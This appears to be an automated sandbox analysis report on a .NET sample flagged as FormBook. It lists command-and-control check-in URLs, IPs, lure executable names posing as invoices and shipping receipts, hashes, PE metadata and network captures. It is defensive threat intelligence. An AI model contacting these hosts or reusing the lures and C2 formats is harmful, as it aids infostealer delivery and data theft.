                                                        • www.mkpricephoto.com/sh2m/?8pQLN=M5mtQoHkyhxvNjqVlN4PGsv6kOee2cR+qVO1qalFjtpNC9HX6pJqwZiEg4Ppodp8IyRJ90NYeQ==&D6Ot3x=-Z8XfPP
                                                        17jLieeOPx.exeGet hashmaliciousBrowse
                                                        • www.totally-seo.com/p2io/?D48=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&2dYX6=1b-D6VYx
                                                        fMWJqYA8ae.exeGet hashmaliciousBrowse
                                                        • www.anewdistraction.com/p2io/?d0=5juHFPp&3fut_=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAc6EPDBh5FJ4wioMw==
                                                        scan-copy059950059pdf.exeGet hashmaliciousBrowse
                                                        • www.brooklynbrewbazaar.com/fmjo/?2dS4SpX8=qUbk/uSP+pf6p8qmG7yr2cJmoye0DgYz5erMRyDDKx4Ymj9j4BqWqohjbtdVFlEBw6X/&qXYlb=6lNDIzXhO2g0
                                                        SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                        • www.naturalbeautyapparel.com/ftgq/?8p=58hLLa3vc2EaUDgAeKLskrXr8RI4DwN7z0OiuDdYZF5g/qPz05bciOqqek20YkD5yVzPo95r2g==&C48xf8=VFQ8p8YH
                                                        rove.exeGet hashmaliciousBrowse
                                                        • www.weab3.com/aipc/?6lSp=ArO83PE0Mh0TtZa0&bv4=/8Z60H0U3EWOvTAhTSZ91XRC3z3gfjmKnWg9Zo5NhivUL2SmA7Vc3Hh6HSm+FPngCfqp
                                                        Failure Notice Details PDF.exeGet hashmaliciousBrowse
                                                        • www.the-vma.com/j6xw/?pR-xqjW=KJ21CI6nWllw3jb6LNy/7vVKy2oA2dLgDihDwOEUrsElLp9L7M0HGY7NagSED+cXyB7S&srL4=IdpX_hpxaNVLNhX
                                                        1092991(JB#082).exeGet hashmaliciousBrowse
                                                        • www.shopkaitek.com/3edq/?JfEt9j6h=M8eNvF5zuYq6F34lAt80R5nTraHCYrh0rbrF9J+SqtSL9q0uJh3MK9H55PeJhjWLLkFu&ojn0d=RzuliD
                                                        Payment SWIFT_Pdf.exeGet hashmaliciousBrowse
                                                        • www.kellymoorefilms.com/5yue/?GFNDG=9mA+j1cgE0zxC7u3qAlNO+Wrolxb+XCp7JX8Z/rof2uElfHtAjnndbvjTcdg6uA8+xkX&Jv7=XVIXpLcx
                                                        #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                        • www.cljcandles.com/pux4/?Lv0h=urYAAIc58DnUlhBmQa3gzHotkVmoZ0i8F09uLhqyCxRxwOZO+pPIwoj8ux/FJwO59BkQzbo13w==&VlKt=wBNl4pd0L
                                                        HEN.exeGet hashmaliciousBrowse
                                                        • www.portsidemonograms.com/aipc/?TlPt=tbuhbkKiZMbT51ggHlN5rcc+6ZFSDnA65ra1I1/h1SUWu7EEXe8DiVlqCzHYPKZm0j3JlFNexg==&6l=mnSl
                                                        Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                                                        • www.weab3.com/aipc/?K8kl=/8Z60H0U3EWOvTAhTSZ91XRC3z3gfjmKnWg9Zo5NhivUL2SmA7Vc3Hh6HSqHJuLgVZ24lc1TFw==&lxo8y=MzuD_P1pZJ
                                                        Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                        • www.jessicarusselldesign.com/gad0/?1bB=YNKficl4JuMpHD9ZucCDdKw50e3rZtwSzoj4IBtnMReh6UW5QmvMrqjFxOO0E0XDXWWo&3fS=dfc8-RnPKT4
                                                        DHL_119045_Receipt document,pdf.exeGet hashmaliciousBrowse
                                                        • www.wombatwellness.com/vfm2/?2d=mlyx&tzr8=UK/k0ZYUzZvJjxXC0JaC6NFAiBcJLAkUYbslNP+YAqhew59pS6ch9v0JexfzNGtQhbXqRxr51g==
                                                        Pdf Scen Invoice 17INV06003.exeGet hashmaliciousBrowse
                                                        • www.paperlessconsulting.com/s5cm/?k2JxoV=fDKdgJeh5&0bMpLRa=OgwzyNm2z9yPgyWx1Isexu6xb7DlPFRlczqmtYSYXM3VyngRt3QDJ98NtJ5WWIsYqkZ2

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        CLOUDFLARENETUSRFQ-sib.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        PO.docGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        Evershedsnicea NDA file attach...htmGet hashmaliciousBrowse
                                                        • 104.16.18.94
                                                        SecuriteInfo.com.Trojan.PackedNET.825.24532.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        090049000009000.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        Letter 1019.xlsxGet hashmaliciousBrowse
                                                        • 172.67.161.4
                                                        fTxhRIDnrC.dllGet hashmaliciousBrowse
                                                        • 104.20.185.68
                                                        Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        Order.exeGet hashmaliciousBrowse
                                                        • 104.21.40.174
                                                        DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        RRY0yKj2HM.dllGet hashmaliciousBrowse
                                                        • 104.20.184.68
                                                        SecuriteInfo.com.Trojan.PackedNET.721.2973.exeGet hashmaliciousBrowse
                                                        • 104.23.98.190
                                                        SecuriteInfo.com.Trojan.PackedNET.831.4134.exeGet hashmaliciousBrowse
                                                        • 104.23.98.190
                                                        SWIFT COMMERCIAL DUTY 0218J.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        p8Wo6PbOjL.exeGet hashmaliciousBrowse
                                                        • 162.159.130.233
                                                        b7cgnOpObK.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        Invoice 8-6-2021.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        PO187439.exeGet hashmaliciousBrowse
                                                        • 104.21.81.138
                                                        090009000000090.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        PLUSSERVER-ASN1DEBL & INV.docGet hashmaliciousBrowse
                                                        • 31.210.20.45
                                                        BL & INV.docGet hashmaliciousBrowse
                                                        • 31.210.20.45
                                                        BL & INV.docGet hashmaliciousBrowse
                                                        • 31.210.20.45
                                                        8cuLxttsra.exeGet hashmaliciousBrowse
                                                        • 31.210.21.161
                                                        Owbtvvu.exeGet hashmaliciousBrowse
                                                        • 31.210.20.60
                                                        Inqquuirrryyy202106079768900100.exeGet hashmaliciousBrowse
                                                        • 31.210.21.188
                                                        Swift MT103 Transfer.xlsxGet hashmaliciousBrowse
                                                        • 31.210.20.45
                                                        inqqqqquiry9867120210406000900.exeGet hashmaliciousBrowse
                                                        • 31.210.21.188
                                                        tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        IMG_1741000.xlsxGet hashmaliciousBrowse
                                                        • 31.210.20.45
                                                        QyKNw7NioL.exeGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        fMWJqYA8ae.exeGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        Compliance - Notice 06-03.xlsxGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        Request for Courtesy Call - Urgent.xlsxGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        Payment Advice Reference No SWT005262021.exeGet hashmaliciousBrowse
                                                        • 31.210.20.60
                                                        Payment Advice Reference0000 docx.exeGet hashmaliciousBrowse
                                                        • 31.210.20.60
                                                        BVYzIQc9Q3.exeGet hashmaliciousBrowse
                                                        • 31.210.21.63
                                                        9XfX7aaf3F.exeGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        20210524_0019019939010.exeGet hashmaliciousBrowse
                                                        • 31.210.21.188
                                                        SQUARESPACEUSNew Purchase Order20210609.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        LkvumUsaQX.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Payment slip.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        8mnXkjPdP0.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        17jLieeOPx.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        fMWJqYA8ae.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        scan-copy059950059pdf.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        rove.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Failure Notice Details PDF.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        1092991(JB#082).exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Payment SWIFT_Pdf.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        HEN.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        DHL_119045_Receipt document,pdf.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Qgc2Nreer3.exeGet hashmaliciousBrowse
                                                        • 198.185.159.176

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SKlGhwkzTi.exe.log
                                                        Process:C:\Users\user\Desktop\SKlGhwkzTi.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1314
                                                        Entropy (8bit):5.350128552078965
                                                        Encrypted:false
                                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.543136116156561
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                        File name:SKlGhwkzTi.exe
                                                        File size:782336
                                                        MD5:8252e0bd8e579259cc18ceae0c5c6d64
                                                        SHA1:242c3feb78e57de5c30b6f4f6b6d5d9b3332eb08
                                                        SHA256:21b3aba425cfa96bd3c5db2b306591a3a2aa1c8ee6fbdeddfdf60b5e1c0df0ea
                                                        SHA512:58be9b9c10d14a695b1b36315528eadc8d5f0380f8061814bb4d1d0eafd5c2a4293f5f36249befa44a15932dcb554371e32ceaa418d51236ca22740893e46c08
                                                        SSDEEP:12288:ldam8GlMV40J8Sd2AjMqioxcYP3iJ9LfPnkSrIlGOLq+hJickHu9ue6eO1wPIl:ldam8GUwxucYP3ojn5rIAQqEickHu8VZ
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<..`.....................N........... ........@.. .......................@............@................................

                                                        File Icon

                                                        Icon Hash:b6f8c8dccce06110

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4bbf1e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x60C0873C [Wed Jun 9 09:17:48 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xbbec40x57.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x4b68.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xb9f240xba000False0.81059937836data7.59789627336IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xbc0000x4b680x4c00False0.469212582237data4.53035066052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xc20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0xbc1c00x25a8dBase III DBT, version number 0, next free block index 40
                                                        RT_ICON0xbe7680x10a8data
                                                        RT_ICON0xbf8100x988dBase III DBT, version number 0, next free block index 40
                                                        RT_ICON0xc01980x468GLS_BINARY_LSB_FIRST
                                                        RT_GROUP_ICON0xc06000x3edata
                                                        RT_VERSION0xc06400x338data
                                                        RT_MANIFEST0xc09780x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0000 0x04b0
                                                        LegalCopyrightCopyright Kanal 2 2012
                                                        Assembly Version2.0.0.0
                                                        InternalNameSoapOption.exe
                                                        FileVersion2.0.0.0
                                                        CompanyNameKanal 2
                                                        LegalTrademarks
                                                        Comments
                                                        ProductNameeg2012
                                                        ProductVersion2.0.0.0
                                                        FileDescriptioneg2012
                                                        OriginalFilenameSoapOption.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        06/10/21-17:59:39.007769TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4151.106.118.75
                                                        06/10/21-17:59:39.007769TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4151.106.118.75
                                                        06/10/21-17:59:39.007769TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4151.106.118.75
                                                        06/10/21-17:59:56.257801TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.169.223.13
                                                        06/10/21-17:59:56.257801TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.169.223.13
                                                        06/10/21-17:59:56.257801TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.169.223.13

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jun 10, 2021 17:59:22.109391928 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:22.316430092 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.316554070 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:22.523013115 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.523107052 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:22.729912043 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.729955912 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.729983091 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.730145931 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:22.730232000 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:22.936537981 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.936641932 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.936832905 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:27.829025030 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:27.963891983 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:27.964020014 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:27.964210987 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.100598097 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103754044 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103806973 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103830099 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103847027 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103867054 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103885889 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103904963 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103915930 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.103924990 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103945971 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103964090 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.104021072 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.104074955 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.104319096 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238409042 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238464117 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238502026 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238539934 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238578081 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238625050 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238643885 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238670111 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238683939 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238692045 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238696098 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238699913 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238708973 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238730907 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238749981 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238776922 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238789082 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238826990 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238847017 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238859892 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238867044 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238867044 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238905907 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238954067 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238955021 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238980055 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238996983 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239010096 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239036083 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239047050 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239074945 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239083052 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239128113 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239134073 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239185095 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239207029 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239224911 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239237070 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239273071 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:33.206686974 CEST4976780192.168.2.478.31.67.91
                                                        Jun 10, 2021 17:59:33.259607077 CEST804976778.31.67.91192.168.2.4
                                                        Jun 10, 2021 17:59:33.259829998 CEST4976780192.168.2.478.31.67.91
                                                        Jun 10, 2021 17:59:33.260176897 CEST4976780192.168.2.478.31.67.91
                                                        Jun 10, 2021 17:59:33.312942028 CEST804976778.31.67.91192.168.2.4
                                                        Jun 10, 2021 17:59:33.313033104 CEST804976778.31.67.91192.168.2.4
                                                        Jun 10, 2021 17:59:33.313057899 CEST804976778.31.67.91192.168.2.4
                                                        Jun 10, 2021 17:59:33.323225975 CEST4976780192.168.2.478.31.67.91
                                                        Jun 10, 2021 17:59:33.324178934 CEST4976780192.168.2.478.31.67.91
                                                        Jun 10, 2021 17:59:33.377404928 CEST804976778.31.67.91192.168.2.4
                                                        Jun 10, 2021 17:59:38.739728928 CEST4976880192.168.2.4151.106.118.75
                                                        Jun 10, 2021 17:59:39.007287979 CEST8049768151.106.118.75192.168.2.4
                                                        Jun 10, 2021 17:59:39.007587910 CEST4976880192.168.2.4151.106.118.75
                                                        Jun 10, 2021 17:59:39.007769108 CEST4976880192.168.2.4151.106.118.75
                                                        Jun 10, 2021 17:59:39.276942968 CEST8049768151.106.118.75192.168.2.4
                                                        Jun 10, 2021 17:59:39.509634018 CEST4976880192.168.2.4151.106.118.75
                                                        Jun 10, 2021 17:59:39.816592932 CEST8049768151.106.118.75192.168.2.4
                                                        Jun 10, 2021 17:59:41.822793961 CEST8049768151.106.118.75192.168.2.4
                                                        Jun 10, 2021 17:59:41.822899103 CEST4976880192.168.2.4151.106.118.75
